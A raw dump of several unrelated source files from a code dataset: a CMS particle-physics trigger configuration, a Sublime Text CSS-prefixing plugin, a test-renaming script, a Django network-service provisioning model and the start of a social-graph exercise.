\"hltEcalRawToRecHitFacility\" ),\n type = cms.string( \"all\" ),\n doES = cms.bool( False ),\n sourceTag_es = cms.InputTag( \"NotNeededoESfalse\" ),\n MuJobPSet = cms.PSet( ),\n JetJobPSet = cms.VPSet( \n ),\n EmJobPSet = cms.VPSet( \n ),\n CandJobPSet = cms.VPSet( \n )\n)\nprocess.hltEcalRecHitAll = cms.EDProducer( \"EcalRawToRecHitProducer\",\n lazyGetterTag = cms.InputTag( \"hltEcalRawToRecHitFacility\" ),\n sourceTag = cms.InputTag( \"hltEcalRegionalRestFEDs\" ),\n splitOutput = cms.bool( True ),\n EBrechitCollection = cms.string( \"EcalRecHitsEB\" ),\n EErechitCollection = cms.string( \"EcalRecHitsEE\" ),\n rechitCollection = cms.string( \"NotNeededsplitOutputTrue\" )\n)\nprocess.hltHcalDigis = cms.EDProducer( \"HcalRawToDigi\",\n InputLabel = cms.InputTag( \"source\" ),\n UnpackCalib = cms.untracked.bool( True ),\n UnpackZDC = cms.untracked.bool( True ),\n firstSample = cms.int32( 0 ),\n lastSample = cms.int32( 9 ),\n FilterDataQuality = cms.bool( True )\n)\nprocess.hltHbhereco = cms.EDProducer( \"HcalSimpleReconstructor\",\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n dropZSmarkedPassed = cms.bool( True ),\n Subdetector = cms.string( \"HBHE\" ),\n firstSample = cms.int32( 4 ),\n samplesToAdd = cms.int32( 4 ),\n correctForTimeslew = cms.bool( True ),\n correctForPhaseContainment = cms.bool( True ),\n correctionPhaseNS = cms.double( 13.0 )\n)\nprocess.hltHfreco = cms.EDProducer( \"HcalSimpleReconstructor\",\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n dropZSmarkedPassed = cms.bool( True ),\n Subdetector = cms.string( \"HF\" ),\n firstSample = cms.int32( 3 ),\n samplesToAdd = cms.int32( 1 ),\n correctForTimeslew = cms.bool( False ),\n correctForPhaseContainment = cms.bool( False ),\n correctionPhaseNS = cms.double( 0.0 )\n)\nprocess.hltHoreco = cms.EDProducer( \"HcalSimpleReconstructor\",\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n dropZSmarkedPassed = cms.bool( True ),\n Subdetector = cms.string( \"HO\" ),\n firstSample = cms.int32( 4 ),\n samplesToAdd = cms.int32( 4 ),\n correctForTimeslew = cms.bool( True ),\n correctForPhaseContainment = cms.bool( True ),\n correctionPhaseNS = cms.double( 13.0 )\n)\nprocess.hltTowerMakerForAll = cms.EDProducer( \"CaloTowersCreator\",\n EBThreshold = cms.double( 0.09 ),\n EEThreshold = cms.double( 0.45 ),\n UseEtEBTreshold = cms.bool( False ),\n UseEtEETreshold = cms.bool( False ),\n UseSymEBTreshold = cms.bool( False ),\n UseSymEETreshold = cms.bool( False ),\n HcalThreshold = cms.double( -1000.0 ),\n HBThreshold = cms.double( 0.9 ),\n HESThreshold = cms.double( 1.4 ),\n HEDThreshold = cms.double( 1.4 ),\n HOThreshold0 = cms.double( 1.1 ),\n HOThresholdPlus1 = cms.double( 1.1 ),\n HOThresholdMinus1 = cms.double( 1.1 ),\n HOThresholdPlus2 = cms.double( 1.1 ),\n HOThresholdMinus2 = cms.double( 1.1 ),\n HF1Threshold = cms.double( 1.2 ),\n HF2Threshold = cms.double( 1.8 ),\n EBWeight = cms.double( 1.0 ),\n EEWeight = cms.double( 1.0 ),\n HBWeight = cms.double( 1.0 ),\n HESWeight = cms.double( 1.0 ),\n HEDWeight = cms.double( 1.0 ),\n HOWeight = cms.double( 1.0E-99 ),\n HF1Weight = cms.double( 1.0 ),\n HF2Weight = cms.double( 1.0 ),\n EcutTower = cms.double( -1000.0 ),\n EBSumThreshold = cms.double( 0.2 ),\n EESumThreshold = cms.double( 0.45 ),\n UseHO = cms.bool( False ),\n MomConstrMethod = cms.int32( 1 ),\n MomHBDepth = cms.double( 0.2 ),\n MomHEDepth = cms.double( 0.4 ),\n MomEBDepth = cms.double( 0.3 ),\n MomEEDepth = cms.double( 0.0 ),\n hbheInput = cms.InputTag( \"hltHbhereco\" ),\n hoInput = cms.InputTag( \"hltHoreco\" ),\n hfInput = cms.InputTag( \"hltHfreco\" ),\n AllowMissingInputs = cms.bool( False ),\n HcalAcceptSeverityLevel = cms.uint32( 999 ),\n EcalAcceptSeverityLevel = cms.uint32( 1 ),\n UseHcalRecoveredHits = cms.bool( True ),\n UseEcalRecoveredHits = cms.bool( True ),\n EBGrid = cms.vdouble( ),\n EBWeights = cms.vdouble( ),\n EEGrid = cms.vdouble( ),\n EEWeights = cms.vdouble( ),\n HBGrid = cms.vdouble( ),\n HBWeights = cms.vdouble( ),\n HESGrid = cms.vdouble( ),\n HESWeights = cms.vdouble( ),\n HEDGrid = cms.vdouble( ),\n HEDWeights = cms.vdouble( ),\n HOGrid = cms.vdouble( ),\n HOWeights = cms.vdouble( ),\n HF1Grid = cms.vdouble( ),\n HF1Weights = cms.vdouble( ),\n HF2Grid = cms.vdouble( ),\n HF2Weights = cms.vdouble( ),\n ecalInputs = cms.VInputTag( 'hltEcalRecHitAll:EcalRecHitsEB','hltEcalRecHitAll:EcalRecHitsEE' )\n)\nprocess.hltTowerMakerForEcal = cms.EDProducer( \"CaloTowersCreator\",\n EBThreshold = cms.double( 0.09 ),\n EEThreshold = cms.double( 0.45 ),\n UseEtEBTreshold = cms.bool( False ),\n UseEtEETreshold = cms.bool( False ),\n UseSymEBTreshold = cms.bool( False ),\n UseSymEETreshold = cms.bool( False ),\n HcalThreshold = cms.double( -1000.0 ),\n HBThreshold = cms.double( 0.9 ),\n HESThreshold = cms.double( 1.4 ),\n HEDThreshold = cms.double( 1.4 ),\n HOThreshold0 = cms.double( 1.1 ),\n HOThresholdPlus1 = cms.double( 1.1 ),\n HOThresholdMinus1 = cms.double( 1.1 ),\n HOThresholdPlus2 = cms.double( 1.1 ),\n HOThresholdMinus2 = cms.double( 1.1 ),\n HF1Threshold = cms.double( 1.2 ),\n HF2Threshold = cms.double( 1.8 ),\n EBWeight = cms.double( 1.0 ),\n EEWeight = cms.double( 1.0 ),\n HBWeight = cms.double( 1.0 ),\n HESWeight = cms.double( 1.0 ),\n HEDWeight = cms.double( 1.0 ),\n HOWeight = cms.double( 1.0E-99 ),\n HF1Weight = cms.double( 1.0 ),\n HF2Weight = cms.double( 1.0 ),\n EcutTower = cms.double( -1000.0 ),\n EBSumThreshold = cms.double( 0.2 ),\n EESumThreshold = cms.double( 0.45 ),\n UseHO = cms.bool( False ),\n MomConstrMethod = cms.int32( 1 ),\n MomHBDepth = cms.double( 0.2 ),\n MomHEDepth = cms.double( 0.4 ),\n MomEBDepth = cms.double( 0.3 ),\n MomEEDepth = cms.double( 0.0 ),\n hbheInput = cms.InputTag( \"hltHbhereco\" ),\n hoInput = cms.InputTag( \"hltHoreco\" ),\n hfInput = cms.InputTag( \"hltHfreco\" ),\n AllowMissingInputs = cms.bool( False ),\n HcalAcceptSeverityLevel = cms.uint32( 999 ),\n EcalAcceptSeverityLevel = cms.uint32( 1 ),\n UseHcalRecoveredHits = cms.bool( True ),\n UseEcalRecoveredHits = cms.bool( True ),\n EBGrid = cms.vdouble( ),\n EBWeights = cms.vdouble( ),\n EEGrid = cms.vdouble( ),\n EEWeights = cms.vdouble( ),\n HBGrid = cms.vdouble( ),\n HBWeights = cms.vdouble( ),\n HESGrid = cms.vdouble( ),\n HESWeights = cms.vdouble( ),\n HEDGrid = cms.vdouble( ),\n HEDWeights = cms.vdouble( ),\n HOGrid = cms.vdouble( ),\n HOWeights = cms.vdouble( ),\n HF1Grid = cms.vdouble( ),\n HF1Weights = cms.vdouble( ),\n HF2Grid = cms.vdouble( ),\n HF2Weights = cms.vdouble( ),\n ecalInputs = cms.VInputTag( 'hltEcalRecHitAll:EcalRecHitsEB','hltEcalRecHitAll:EcalRecHitsEE' )\n)\nprocess.hltBoolEnd = cms.EDFilter( \"HLTBool\",\n result = cms.bool( True )\n)\nprocess.HLTHcalSimpleRecHitFilter = cms.EDFilter( \"HLTHcalSimpleRecHitFilter\",\n threshold = cms.double( 12.0 ),\n HFRecHitCollection = cms.InputTag( \"hltHfreco\" ),\n maskedChannels = cms.vint32( 8137, 8141, 8147, 8149, 8500 )\n)\nprocess.hltTriggerSummaryAOD = cms.EDProducer( \"TriggerSummaryProducerAOD\",\n processName = cms.string( \"@\" )\n)\nprocess.hltPreTriggerSummaryRAW = cms.EDFilter( \"HLTPrescaler\" )\nprocess.hltTriggerSummaryRAW = cms.EDProducer( \"TriggerSummaryProducerRAW\",\n processName = cms.string( \"@\" )\n)\nprocess.hltBoolFinalPath = cms.EDFilter( \"HLTBool\",\n result = cms.bool( False )\n)\nprocess.hltL1GtTrigReport = cms.EDAnalyzer( \"L1GtTrigReport\",\n UseL1GlobalTriggerRecord = cms.bool( False ),\n L1GtRecordInputTag = cms.InputTag( \"hltGtDigis\" )\n)\nprocess.hltTrigReport = cms.EDAnalyzer( \"HLTrigReport\",\n HLTriggerResults = cms.InputTag( 'TriggerResults','','HLT' )\n)\nprocess.DQML1Scalers = cms.EDAnalyzer( \"L1Scalers\",\n l1GtData = cms.InputTag( \"hltGtDigis\" ),\n fedRawData = cms.InputTag( \"source\" ),\n HFRecHitCollection = cms.InputTag( \"hltHfreco\" ),\n maskedChannels = cms.untracked.vint32( 8137, 8141, 8147, 8149, 8500 )\n)\nprocess.DQMHLTScalers = cms.EDAnalyzer( \"HLTScalers\",\n triggerResults = cms.InputTag( 'TriggerResults','','HLT' )\n)\nprocess.hltOutputA = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputA.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( 'HLT_EcalActivity1',\n 'HLT_HFActivity1',\n 'HLTriggerFinalPath',\n 'HLTriggerFirstPath' ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep *_hltL1GtObjectMap_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputDQM = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputDQM.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep triggerTriggerEventWithRefs_*_*_*',\n 'keep *_hltDt4DSegments_*_*',\n 'keep *_hltL1GtObjectMap_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputHLTDQM = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputHLTDQM.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep triggerTriggerEventWithRefs_*_*_*',\n 'keep *_hltL1NonIsoLargeWindowElectronPixelSeeds_*_*',\n 'keep *_hltL2TauRelaxingIsolationSelector_*_*',\n 'keep *_hltL2TauJets_*_*',\n 'keep *_hltL2MuonCandidates_*_*',\n 'keep *_hltL1extraParticles_*_*',\n 'keep *_hltTowerMakerForMuons_*_*',\n 'keep *_hltL2TauNarrowConeIsolationProducer_*_*',\n 'keep *_hltL2MuonSeeds_*_*',\n 'keep *_hltL1NonIsoRecoEcalCandidate_*_*',\n 'keep *_hltL3Muons_*_*',\n 'keep *_hltL1IsoLargeWindowElectronPixelSeeds_*_*',\n 'keep *_hltL1IsoSiStripElectronPixelSeeds_*_*',\n 'keep *_hltPixelMatchLargeWindowElectronsL1Iso_*_*',\n 'keep *_hltL1IsoStartUpElectronPixelSeeds_*_*',\n 'keep *_hltIterativeCone5CaloJets_*_*',\n 'keep *_hltL2Muons_*_*',\n 'keep *_hltL1IsoRecoEcalCandidate_*_*',\n 'keep *_hltL1IsolatedElectronHcalIsol_*_*',\n 'keep *_hltL3TrajectorySeed_*_*',\n 'keep *_hltOfflineBeamSpot_*_*',\n 'keep *_hltMet_*_*',\n 'keep *_hltL1NonIsolatedElectronHcalIsol_*_*',\n 'keep *_hltL1NonIsoStartUpElectronPixelSeeds_*_*',\n 'keep *_hltL2MuonIsolations_*_*',\n 'keep *_hltPixelMatchLargeWindowElectronsL1NonIso_*_*',\n 'keep *_hltL1NonIsoSiStripElectronPixelSeeds_*_*',\n 'keep *_hltL3MuonIsolations_*_*',\n 'keep *_hltL3MuonCandidates_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputCalibration = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputCalibration.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputEcalCalibration = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputEcalCalibration.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep *_hltEcalCalibrationRaw_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputALCAPHISYM = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputALCAPHISYM.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep *_hltAlCaPhiSymStream_*_*',\n 'keep *_hltGtDigis_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputALCAPHISYMHCAL = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputALCAPHISYMHCAL.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep *_hltL1extraParticles_*_*',\n 'keep *_hltGctDigis_*_*',\n 'keep *_hltAlCaHcalFEDSelector_*_*',\n 'keep *_hltGtDigis_*_*',\n 'keep *_hltL1GtObjectMap_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputALCAP0 = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputALCAP0.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *',\n 'keep edmTriggerResults_*_*_*',\n 'keep triggerTriggerEvent_*_*_*',\n 'keep *_hltAlCaEtaRegRecHitsCosmics_*_*',\n 'keep *_hltAlCaPi0RegRecHitsCosmics_*_*',\n 'keep *_hltAlCaPi0RegRecHits_*_*',\n 'keep *_hltAlCaEtaRegRecHits_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputRPCMON = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputRPCMON.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *',\n 'keep edmTriggerResults_*_*_*',\n 'keep *_hltRpcRecHits_*_*',\n 'keep *_hltMuonDTDigis_*_*',\n 'keep *_hltCscSegments_*_*',\n 'keep *_hltDt4DSegments_*_*',\n 'keep L1MuGMTCands_hltGtDigis_*_*',\n 'keep L1MuGMTReadoutCollection_hltGtDigis_*_*',\n 'keep *_hltMuonRPCDigis_*_*' ),\n use_compression = cms.untracked.bool( True ),\n compression_level = cms.untracked.int32( 1 ),\n max_event_size = cms.untracked.int32( 7000000 )\n)\nprocess.hltOutputFEDErrors = cms.OutputModule( \"PoolOutputModule\",\n fileName = cms.untracked.string( \"outputFEDErrors.root\" ),\n SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring( ) ),\n outputCommands = cms.untracked.vstring( 'drop *_hlt*_*_*',\n 'keep FEDRawDataCollection_source_*_*',\n 'keep edmTriggerResults_*_*_*' )\n)\n\nprocess.HLTBeginSequence = cms.Sequence( process.hltTriggerType + process.hltEventNumber + process.hltGtDigis + process.hltGctDigis + process.hltL1GtObjectMap + process.hltL1extraParticles + process.hltOfflineBeamSpot )\nprocess.HLTDoLocalHcalSequence = cms.Sequence( process.hltHcalDigis + process.hltHbhereco + process.hltHfreco + process.hltHoreco )\nprocess.HLTDoCaloSequence = cms.Sequence( process.hltEcalRawToRecHitFacility + process.hltEcalRegionalRestFEDs + process.hltEcalRecHitAll + process.HLTDoLocalHcalSequence + process.hltTowerMakerForAll )\nprocess.HLTEndSequence = cms.Sequence( process.hltBoolEnd )\n\nprocess.HLTriggerFirstPath = cms.Path( process.hltGetRaw + process.HLTBeginSequence + process.hltPreFirstPath + process.hltBoolFirstPath )\n#process.HLT_EcalActivity1 = cms.Path( process.HLTBeginSequence + process.HLTDoCaloSequence + process.hltTowerMakerForEcal + process.hltTowerCandidateMakerForEcal + process.hltHI1jet35U + process.HLTEndSequence )\nprocess.HLT_HFActivity1 = cms.Path( process.HLTBeginSequence + process.hltHcalDigis + process.hltHfreco + process.HLTHcalSimpleRecHitFilter + process.HLTEndSequence )\nprocess.HLTriggerFinalPath = cms.Path( process.hltTriggerSummaryAOD + process.hltPreTriggerSummaryRAW + process.hltTriggerSummaryRAW + process.hltBoolFinalPath )\nprocess.HLTAnalyzerEndpath = cms.EndPath( process.hltL1GtTrigReport + process.hltTrigReport )\n#process.HLTOutput = cms.EndPath( process.DQML1Scalers + process.DQMHLTScalers + process.hltOutputA + process.hltOutputDQM + process.hltOutputHLTDQM )\n#process.AlCaOutput = cms.EndPath( process.hltOutputCalibration + process.hltOutputEcalCalibration + process.hltOutputALCAPHISYM + process.hltOutputALCAPHISYMHCAL + process.hltOutputALCAP0 + process.hltOutputRPCMON + process.hltOutputFEDErrors )\n\nprocess.setName_('HLTTest')\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32( 100 )\n)\nprocess.options = cms.untracked.PSet(\n wantSummary = cms.untracked.bool( True )\n)\n\nprocess.GlobalTag.connect = 'frontier://FrontierProd/CMS_COND_31X_GLOBALTAG'\nprocess.GlobalTag.globaltag = 'MC_31X_V9::All'\n\n\n# Automatic addition of the customisation function\ndef customise(process):\n\n process.hltTrigReport.HLTriggerResults = cms.InputTag( 'TriggerResults','',process.name_() )\n\n process.options.wantSummary = cms.untracked.bool(True)\n process.MessageLogger.categories.append('TriggerSummaryProducerAOD')\n process.MessageLogger.categories.append('L1GtTrigReport')\n process.MessageLogger.categories.append('HLTrigReport')\n\n return(process)\n\n\n# End of customisation function definition\n\nprocess = customise(process)\n","sub_path":"pp/HLT/sw/HLTriger/special/test/OnLine_HLT_Test.py","file_name":"OnLine_HLT_Test.py","file_ext":"py","file_size_in_byte":85006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"451440699","text":"import sublime\nimport sublime_plugin\nimport urllib\nimport urllib.request\nimport urllib.error\nimport threading\n\n\nclass PrefixrCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n # We check for braces since we can do a better job of preserving\n # whitespace when braces are not present\n braces = False\n sels = self.view.sel()\n for sel in sels:\n if self.view.substr(sel).find('{') != -1:\n braces = True\n\n # Expand selection to braces, unfortunately this can't use the\n # built in move_to brackets since that matches parentheses also\n if not braces:\n new_sels = []\n for sel in sels:\n new_sels.append(self.view.find('\\}', sel.end()))\n sels.clear()\n for sel in new_sels:\n sels.add(sel)\n self.view.run_command(\"expand_selection\", {\"to\": \"brackets\"})\n\n # We start one thread per selection so we don't lock up the interface\n # while waiting for the response from the API\n threads = []\n for sel in sels:\n string = self.view.substr(sel)\n thread = PrefixrApiCall(sel, string, 5)\n threads.append(thread)\n thread.start()\n\n # We clear all selection because we are going to manually set them\n self.view.sel().clear()\n\n # This creates an edit group so we can undo all changes in one go\n edit = self.view.begin_edit('prefixr')\n\n self.handle_threads(edit, threads, braces)\n\n\nclass PrefixrApiCall(threading.Thread):\n def __init__(self, sel, string, timeout):\n self.sel = sel\n self.original = string\n self.timeout = timeout\n self.result = None\n threading.Thread.__init__(self)\n\n def run(self):\n try:\n data = urllib.urlencode({'css': self.original})\n request = urllib.request('http://prefixr.com/api/index.php', data,\n headers={\"User-Agent\": \"Sublime Prefixr\"})\n http_file = urllib.request.urlopen(request, timeout=self.timeout)\n self.result = http_file.read()\n return\n\n except urllib.error.HTTPError as e:\n err = '%s: HTTP error %s contacting API' % (__name__, str(e.code))\n except urllib.error.URLError as e:\n err = '%s: URL error %s contacting API' % (__name__, str(e.reason))\n\n sublime.error_message(err)\n self.result = False","sub_path":"Packages/User/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"35475804","text":"import os\n\nsubtask_dict = { \"01\" : \"1\",\n \"02\" : \"1\",\n \"03\" : \"2\",\n \"04\" : \"3\",\n \"05\" : \"4\" }\n\ntest_no = 1\n\nfor f in sorted(os.listdir(\"../\")):\n if f.endswith(\".in\") and f.startswith(\"tinklas.\"):\n label = f.rsplit(\".\",2)[1]\n\n old_subtask = label[1]+label[2]\n new_subtask = subtask_dict[old_subtask]\n new_test = \"{0:02d}\".format(test_no)\n\n os.rename(\"../\"+f, \"../network.\"+new_test+\"-\"+new_subtask+\".in\")\n\n test_no = test_no+1\n","sub_path":"testdata/network/scripts/rename_all.py","file_name":"rename_all.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"113652164","text":"# Django imports\nfrom django.db import models\nfrom django.contrib.postgres.fields import JSONField\nfrom django.conf import settings\n\n# Python imports\nimport json\nimport time\nimport requests\nimport os\nfrom enum import Enum\nfrom pprint import pprint\nimport logging\n\n\n# ONSA imports\nfrom worker.lib import ConfigHandler\nfrom worker.lib.common.render import render\nfrom worker.utils.worker_maps import *\nfrom worker.utils.utils import *\nfrom worker.constants import *\nfrom worker.exceptions import *\n\n\nclass Service(models.Model):\n client_name = models.CharField(max_length=50)\n service_id = models.CharField(max_length=50, primary_key=True)\n service_type = models.CharField(max_length=50)\n service_state = models.CharField(max_length=50)\n parameters = JSONField()\n\n def __str__(self):\n return self.service_id\n\n def deploy(self):\n tasks = Task.objects.filter(\n service=self, task_state=INITIAL_TASK_STATE)\n\n # print(\"Service Id: \", self.service_id)\n # print(\"Requested Tasks: \", tasks)\n\n completed_tasks = []\n failed_tasks = []\n\n self.service_state = CONFIG_GENERAL_ERROR\n\n for task in tasks:\n task.run_task()\n task.save()\n if task.task_state not in ERROR_STATES:\n completed_tasks.append(task)\n elif task.task_state in ROLLBACK_STATES:\n task.rollback()\n task.save()\n failed_tasks.append(task)\n # TODO DO FOR completed tasks rollback\n # for t in completed_tasks:\n # t.rollback()\n # t.save()\n break\n else:\n self.service_state = task.task_state\n # do not rollback, since this failed task is not \"rollbackeable\"\n\n if len(failed_tasks):\n self.service_state = CONFIG_GENERAL_ERROR\n elif len(completed_tasks) == len(tasks):\n self.service_state = CONFIG_OK\n\n self.save()\n # Let charles know about service state\n update_charles_service(self)\n\n\nclass Task(models.Model):\n service = models.ForeignKey(Service, on_delete=models.CASCADE)\n task_state = models.CharField(max_length=50, blank=True)\n op_type = models.CharField(max_length=30)\n device = JSONField()\n\n def __str__(self):\n return self.service.service_id\n\n def _gen_template_path(self):\n if VendorMap[self.device['vendor']] == 'transition':\n template_path = \"templates/\" + VendorMap[self.device['vendor']].lower(\n ) + \"/\" + self.device['model'].lower() + \"/\" + self.op_type.upper() + \"_L2SERVICE.CONF\"\n else:\n if self.service.service_type != \"vpls\":\n template_path = \"templates/\" + VendorMap[self.device['vendor']].lower() + \"/\" + self.device['model'].lower() + \"/\" + self.op_type.upper() + \\\n \"_\" + self.service.service_type.split(\"_\")[1].upper(\n ) + self.service.service_type.split(\"_\")[0].upper() + \".CONF\"\n else:\n template_path = \"templates/\" + VendorMap[self.device['vendor']].lower() + \"/\" + self.device['model'].lower() + \"/\" + self.op_type.upper() + \\\n \"_\" + self.service.service_type.upper() + \".CONF\"\n\n return template_path\n\n def run_task(self):\n dir = os.path.dirname(os.path.abspath(__file__))\n\n # Generates template path\n template_path = self._gen_template_path()\n template_path = os.path.join(dir, template_path)\n logging.info(template_path)\n\n # Generates variables path\n variables_path = \"variables/\" + self.service.service_type.upper() + \".json\"\n variables_path = os.path.join(dir, variables_path)\n logging.info(variables_path)\n\n try:\n # Set up parameters\n params = {}\n params['mgmt_ip'] = self.device['mgmt_ip'].replace('/32', '')\n params['service_id'] = self.service.service_id\n params['service_type'] = self.service.service_type\n params['client_name'] = self.service.client_name\n params.update(self.service.parameters)\n params['an_port_description'] = \"ACTIVO_ID_\" + \\\n str(self.service.parameters['access_port_services'])\n logging.info(f'params: {params}')\n\n params = json.loads(render(variables_path, params))\n logging.info(f'parameters to be used: {params}')\n except BaseException as e:\n logging.error(e)\n print(e)\n return\n\n config_handler = getattr(\n ConfigHandler.ConfigHandler, StrategyMap[VendorMap[self.device['vendor']]])\n logging.info(\"strategy: \" +\n StrategyMap[VendorMap[self.device['vendor']]])\n\n try:\n status = config_handler(template_path, params)\n self.task_state = status\n except BaseException as e:\n logging.error(e)\n self.task_state = CONFIG_GENERAL_ERROR\n logging.info(f'Config task state: {self.task_state}')\n\n def rollback(self):\n\n dir = os.path.dirname(os.path.abspath(__file__))\n\n if VendorMap[self.device['vendor']] == 'transition':\n template_path = \"templates/\" + VendorMap[self.device['vendor']].lower(\n ) + \"/\" + self.device['model'].lower() + \"/\" + \"DELETE_L2SERVICE.CONF\"\n else:\n if self.service.service_type != \"vpls\":\n template_path = \"templates/\" + VendorMap[self.device['vendor']].lower() + \"/\" + self.device['model'].lower(\n ) + \"/\" + \"DELETE_\" + self.service.service_type.split(\"_\")[1].upper() + self.service.service_type.split(\"_\")[0].upper() + \".CONF\"\n else:\n template_path = \"templates/\" + VendorMap[self.device['vendor']].lower() + \"/\" + self.device['model'].lower(\n ) + \"/\" + \"DELETE_\" + self.service.service_type.upper() + \".CONF\"\n\n template_path = os.path.join(dir, template_path)\n\n variables_path = \"variables/\" + self.service.service_type.upper() + \".json\"\n variables_path = os.path.join(dir, variables_path)\n\n logging.info(template_path)\n logging.info(variables_path)\n\n params = {}\n params['mgmt_ip'] = self.device['mgmt_ip'].replace('/32', '')\n params['service_id'] = self.service.service_id\n params['service_type'] = self.service.service_type\n params['client_name'] = self.service.client_name\n\n params.update(self.service.parameters)\n\n params = json.loads(render(variables_path, params))\n\n config_handler = getattr(\n ConfigHandler.ConfigHandler, StrategyMap[VendorMap[self.device['vendor']]])\n try:\n config_handler(template_path, params)\n self.task_state = CONFIG_ROLLBACK_OK\n except BaseException as e:\n logging.error(e)\n self.task_state = CONFIG_ROLLBACK_ERROR\n logging.debug(f'Rollback state: {self.task_state}')\n","sub_path":"worker/worker/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"261981240","text":"import random \nfrom util import Queue\nimport time\n\n\nclass User:\n def __init__(self, name):\n self.name = name\n def __repr__(self):\n return self.name\n\nclass SocialGraph:\n def __init__(self):\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n def add_friendship(self, user_id, friend_id):\n \"\"\"\n Creates a bi-directional friendship\n \"\"\"\n if user_id == friend_id:\n print(\"WARNING: You cannot be friends with yourself\")\n return False\n elif friend_id in self.friendships[user_id] or user_id in self.friendships[friend_id]:\n print(\"WARNING: Friendship already exists\")\n return False\n else:\n self.friendships[user_id].add(friend_id)\n self.friendships[friend_id].add(user_id)\n return True \n # Same as add vertex\n def add_user(self, name):\n \"\"\"\n Create a new user with a sequential integer ID\n \"\"\"\n self.last_id += 1 # automatically increment the ID to assign the new user\n self.users[self.last_id] = User(name)\n self.friendships[self.last_id] = set()\n\n def populate_graph_linear(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n\n Creates that number of users and a randomly distributed friendships\n between those users.\n\n The number of users must be greater than the average number of friendships.\n \"\"\"\n # Reset 